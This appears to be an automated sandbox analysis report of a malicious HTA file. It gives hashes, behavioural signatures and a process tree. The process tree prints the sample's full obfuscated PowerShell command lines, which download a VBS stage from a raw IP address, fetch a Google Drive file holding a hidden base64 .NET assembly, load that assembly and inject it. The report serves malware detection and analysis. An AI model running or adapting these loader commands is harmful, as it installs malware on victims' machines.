Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-10-2024 10:52
Static task
static1
Behavioral task
behavioral1
Sample
greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
Resource
win10v2004-20241007-en
General
-
Target
greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
-
Size
131KB
-
MD5
cbb8dddfef9d1d2893d4a4b51b4f0dab
-
SHA1
595c2221b9613342ed4a82c235ea19fe9c0383f9
-
SHA256
e25677838f8394ed8b59c431e454e3bd0ec107421ef1a2502c5167bdd1340ddc
-
SHA512
1daa9c96c9ba2e6e1939ab2b82e9a8f771f9ba0d4c4d088214864034aa9084483c1f42e5436f32043809a0346f0d59d84eb902946e6f1672175e22cac042d4a4
-
SSDEEP
192:4vCFXMFgYPCgYmHUCYc6dEMoyzsDxgYtaXQ:0CF8qYPRYmHU1Jyh2saYtag
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2088 poWersHElL.eXe 6 2132 powershell.exe 8 2132 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3024 powershell.exe 2132 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2088 poWersHElL.eXe 2492 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWersHElL.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2088 poWersHElL.eXe 2492 powershell.exe 2088 poWersHElL.eXe 2088 poWersHElL.eXe 3024 powershell.exe 2132 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2088 poWersHElL.eXe Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1940 wrote to memory of 2088 1940 mshta.exe 30 PID 1940 wrote to memory of 2088 1940 mshta.exe 30 PID 1940 wrote to memory of 2088 1940 mshta.exe 30 PID 1940 wrote to memory of 2088 1940 mshta.exe 30 PID 2088 wrote to memory of 2492 2088 poWersHElL.eXe 32 PID 2088 wrote to memory of 2492 2088 poWersHElL.eXe 32 PID 2088 wrote to memory of 2492 2088 poWersHElL.eXe 32 PID 2088 wrote to memory of 2492 2088 poWersHElL.eXe 32 PID 2088 wrote to memory of 2804 2088 poWersHElL.eXe 33 PID 2088 wrote to memory of 2804 2088 poWersHElL.eXe 33 PID 2088 wrote to memory of 2804 2088 poWersHElL.eXe 33 PID 2088 wrote to memory of 2804 2088 poWersHElL.eXe 33 PID 2804 wrote to memory of 2692 2804 csc.exe 34 PID 2804 wrote to memory of 2692 2804 csc.exe 34 PID 2804 wrote to memory of 2692 2804 csc.exe 34 PID 2804 wrote to memory of 2692 2804 csc.exe 34 PID 2088 wrote to memory of 2648 2088 poWersHElL.eXe 37 PID 2088 wrote to memory of 2648 2088 poWersHElL.eXe 37 PID 2088 wrote to memory of 2648 2088 poWersHElL.eXe 37 PID 2088 wrote to memory of 2648 2088 poWersHElL.eXe 37 PID 2648 wrote to memory of 3024 2648 WScript.exe 38 PID 2648 wrote to memory of 3024 2648 WScript.exe 38 PID 2648 wrote to memory of 3024 2648 WScript.exe 38 PID 2648 wrote to memory of 3024 2648 WScript.exe 38 PID 3024 wrote to memory of 2132 3024 powershell.exe 40 PID 3024 wrote to memory of 2132 3024 powershell.exe 40 PID 3024 wrote to memory of 2132 3024 powershell.exe 40 PID 3024 wrote to memory of 2132 3024 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\wInDOwsPoWershelL\V1.0\poWersHElL.eXe"C:\Windows\sYSTem32\wInDOwsPoWershelL\V1.0\poWersHElL.eXe" "poWeRsHelL -EX bypass -nOp -W 1 -c devICEcRedEnTiALDePLOYMEnt ; Iex($(Iex('[SysTeM.TeXT.eNcodinG]'+[cHar]0X3A+[CHar]58+'uTf8.getstRINg([SYStem.coNverT]'+[ChAr]58+[CHAr]0X3a+'FrOMbase64string('+[CHar]34+'JExQeDFxblA4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJlckRFRmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp4dixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1F3WUNWRXp3LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3Y09BdkJkQ09qaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJvcFhURixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZUZzYngiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVW94dVR4VnNtUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTFB4MXFuUDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1NS8zMTEvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3N0b2Rvd2l0aG1lLnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0cGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nLnZiUyIsMCwwKTtzVGFyVC1zbEVFUCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmcudmJTIg=='+[Char]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bypass -nOp -W 1 -c devICEcRedEnTiALDePLOYMEnt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aibb6f7s.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAE7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAE6.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2692
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatnewswithgoodthing.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnWUt3aScrJ21hZ2VVcmwgPSBJSG1odHRwczovL2RyaScrJ3ZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBJSG07WUt3d2ViQ2xpZW50JysnID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtZS3dpbWFnZUJ5dGVzID0gWUt3d2ViQ2wnKydpZW50LkRvd25sb2FkRGF0YShZS3dpbWFnZVVybCk7WUt3aW0nKydhZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcoWUt3aW1hZ2VCeXRlcyk7WUt3c3QnKydhcnRGJysnbGFnID0gSUhtPDxCQVNFNjRfU1RBUlQ+PklIbTtZS3dlbmRGbGFnID0gSUhtPDxCQVNFNjRfRU5EPj5JSG07WUt3c3RhcnRJbmRleCA9IFlLd2ltYWdlVGV4dC5JJysnbmRleE9mKFlLd3N0YScrJ3J0RmxhZyk7WUt3ZW5kSW5kZXggPSBZS3dpbWFnZVRleHQuSW5kZXhPZihZS3dlbmRGbGFnKTtZS3dzdGFydEluZGV4IC1nZSAwIC1hbmQgWUt3ZW5kSW5kZXggJysnLWd0IFlLd3N0YXJ0SW5kZXg7WUt3c3RhcnRJbmRleCArPSBZS3dzdGFydEZsYWcuTGVuZ3RoO1lLd2Jhc2U2NExlbmd0JysnaCA9IFlLd2VuZEluZGV4IC0gWUt3c3RhcnRJbmRleDtZS3diYXNlNjRDb21tYW5kID0gWUt3aW1hZ2VUZXh0LlN1YnN0cmluZyhZS3dzdGFydEluZGV4LCBZS3diYXNlNjRMZW5ndGgpO1lLd2Jhc2U2NFJldicrJ2Vyc2VkID0gLWpvaW4gKFlLd2Jhc2U2NENvbW1hbmQnKycuVG9DaGEnKydyQXJyYXkoKSBWSFUgRm9yJysnRWFjaC1PYmonKydlY3QnKycgJysneyBZSycrJ3dfIH0pWy0xLi4tKCcrJ1lLd2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07WUt3Y29tbWFuZEJ5dGVzID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhZS3diYXMnKydlNjRSZXZlcnNlZCk7WUt3bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzJysnZW1ibHknKyddOjpMb2FkKFlLJysnd2MnKydvbW1hbmRCeXRlcyk7WUt3dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWUnKyddLkdldE1ldGhvZChJSG1WQUlJSG0pO1lLd3ZhaU1ldGhvZC5JbnZvJysna2UoWUt3bnVsbCwgQChJSG10eHQuUEwnKydMUE1TLzExMy81NTEuODcxLjY0JysnLjg5MS8vOnB0dGhJSG0sIElIbWRlc2F0aXZhZG9JSG0sIElIJysnbWRlc2F0aXZhZG9JSG0sIElIJysnbWRlc2F0aXZhZG9JJysnSG0sIElIbWFzcG5ldF9yZWdicm93c2Vyc0lIbSwgSUhtZGVzYXRpdmFkb0lIbSwgSUhtZGVzYXRpdmFkb0lIJysnbSxJSG0nKydkZXNhdGl2YWRvSUhtLElIbWRlc2F0aXZhZG9JJysnSG0sSUhtZGVzYXRpdmFkb0lIbSxJSG1kZXNhdGl2YWRvSUhtLElIbWRlc2F0aXZhZG9JSG0sSUhtMUlIbSxJSG1kZXNhdGl2YWRvSUhtKSk7JyktQ1JFcExhQ2UoW2NoQXJdODkrW2NoQXJdNzUrW2NoQXJdMTE5KSxbY2hBcl0zNiAtUkVwTEFjZSAgKFtjaEFyXTczK1tjaEFyXTcyK1tjaEFyXTEwOSksW2NoQXJdMzkgLVJFcExBY2UgIChbY2hBcl04NitbY2hBcl03MitbY2hBcl04NSksW2NoQXJdMTI0KSB8JiAoICRzaEVsTGlkWzFdKyRzaEVMbElEWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YKwi'+'mageUrl = IHmhttps://dri'+'ve.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur IHm;YKwwebClient'+' = New-Object System.Net.WebClient;YKwimageBytes = YKwwebCl'+'ient.DownloadData(YKwimageUrl);YKwim'+'ageText = [System.Text.Encoding]::UTF8.GetStr'+'ing(YKwimageBytes);YKwst'+'artF'+'lag = IHm<<BASE64_START>>IHm;YKwendFlag = IHm<<BASE64_END>>IHm;YKwstartIndex = YKwimageText.I'+'ndexOf(YKwsta'+'rtFlag);YKwendIndex = YKwimageText.IndexOf(YKwendFlag);YKwstartIndex -ge 0 -and YKwendIndex '+'-gt YKwstartIndex;YKwstartIndex += YKwstartFlag.Length;YKwbase64Lengt'+'h = YKwendIndex - YKwstartIndex;YKwbase64Command = YKwimageText.Substring(YKwstartIndex, YKwbase64Length);YKwbase64Rev'+'ersed = -join (YKwbase64Command'+'.ToCha'+'rArray() VHU For'+'Each-Obj'+'ect'+' '+'{ YK'+'w_ })[-1..-('+'YKwbase64Command.Length)];YKwcommandBytes = ['+'System.Convert]::FromBase64String(YKwbas'+'e64Reversed);YKwloadedAssembly = [System.Reflection.Ass'+'embly'+']::Load(YK'+'wc'+'ommandBytes);YKwvaiMethod = [dnlib.IO.Home'+'].GetMethod(IHmVAIIHm);YKwvaiMethod.Invo'+'ke(YKwnull, @(IHmtxt.PL'+'LPMS/113/551.871.64'+'.891//:ptthIHm, IHmdesativadoIHm, IH'+'mdesativadoIHm, IH'+'mdesativadoI'+'Hm, IHmaspnet_regbrowsersIHm, IHmdesativadoIHm, IHmdesativadoIH'+'m,IHm'+'desativadoIHm,IHmdesativadoI'+'Hm,IHmdesativadoIHm,IHmdesativadoIHm,IHmdesativadoIHm,IHm1IHm,IHmdesativadoIHm));')-CREpLaCe([chAr]89+[chAr]75+[chAr]119),[chAr]36 -REpLAce ([chAr]73+[chAr]72+[chAr]109),[chAr]39 -REpLAce ([chAr]86+[chAr]72+[chAr]85),[chAr]124) |& ( $shElLid[1]+$shELlID[13]+'X')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b1e6f8aadbf14c11eec73d8bc9acd790
SHA1bc23302f2c0fdc73407159c6c3bfed1cb8b69859
SHA2562dd71988f52b75e4d1eae69c84b28b78f26cc82719b2c7e226a16229d87969de
SHA512abfc534c08848e378b0318399347bab14384d2f891d676bb586275f0a934b7b6e000632737fc9823962409cbc993fc53e03523a54d1cfef7cf2c876df6843b5d
-
Filesize
3KB
MD588dd1321a8038e4b0da4111828b7560a
SHA1f424e27874939fe2fec1fb8bf5a4ccc495ec0935
SHA256b5605dd8e248cf178125659f1345c125fa053beff726a013973861797be86e19
SHA5126b5423fa607217f1af379c84c9854d7d8877c82779fe376d5f475846a8963f10d7ce0614ffe70092ff69156a2ed8aa2735d5d5267cce3f39b1862c792143c358
-
Filesize
7KB
MD5eb1da9c07b0bbc569892ba98d2bbcb92
SHA1b26224a6530777610d75d79baaf28b954be685d5
SHA2563c51512ed6dace26ae6f0529cd8500fb37feae38fd8b71437b0da2c407818f39
SHA5124604f064084bf4724309a6b252fc083c085a9fd78ce25870f52f3daa997bd503d7842842fe671c6a3d00bdb25ad3cfa3585a1cb0ccc62f93ca516792400be588
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5fd19e039e98e11d1e38399ccbbd36b50
SHA1908ef552231da1c33cb631c9f4d8b03daa5bc6fe
SHA2567d129ce41ca58c04c07589f13ba88d27e6c235700434a1eeb2a946bcff5b0e07
SHA51205c24978fe10b4e1cbebae155ae96221e81d4e781bf2430b6befd5f122f61e5ffd70234e837dec4badffff070166a4288f76dd7194c70cfd9445618fd05dfdc2
-
Filesize
136KB
MD513dfdead1237ba87391d716cb7031869
SHA1367e066163db84465a0fdcc50d7e94c29683bfed
SHA25606e60eee01dabc09b89e85a8f8fd97cc483922022d4b3e37e7887fc299ffe2ef
SHA5124ce204fdb7e54196a01582b5632ff852be3491d181a5d55999b35f2a5a94285b4c4e0ad4c0a5fee6a005a3e6346da251fe6e7bd88a8a122bfb930a1b5c6be7a2
-
Filesize
652B
MD57eca0b69b05fccb110b0bfa5db93d0ff
SHA1ef5a9f3e03059052eefae2351979b3cfe3eeefd8
SHA25667621f01f9a9cbc2a67b8d5d70737b817d4f4674626cb126d60d68f8402e74d5
SHA512eafd574aa18e4131a4bba4b94460d1974a98042f22e138e3645b705abcc7e8a12c294f443e584b6f69367e737f4a7778ce4d355555c1f09691b4095e5aba6b86
-
Filesize
471B
MD5e83b90d88bbe5b8ea6cd0ab094761e19
SHA156f5f01fa3aeae7c510b2b77a7f19aea657fc23f
SHA256c7b8263c0f9bb535d56bef1909a17e1d7c5244b4cf9af3a26abae519210da8c0
SHA512a43eb03a308a404eca6ab5e37b88420fa3fbba3ba94e05710a6f05d7483c04e326af92d38c32c6ceb244c2b72036156410f827ef0205572c918e905cdb8428da
-
Filesize
309B
MD55afe193f08dd6a3acda86e00fc4459d9
SHA1bd3fc7688c54f4b39123b9fd37dd95175b5b4bbc
SHA25685ff4f3d7076b061cb5f7cf685eb424e2dc925d3f2b77a000d2b8c62bc2b7cb3
SHA512f58487064e0d774fb80b8f232091e3f790aa92c10087f2603c5c6a12d3fb94ac366462ba504ec0e0fa004bdda08a9e025fecd2106f7506f4e3f32da636077d73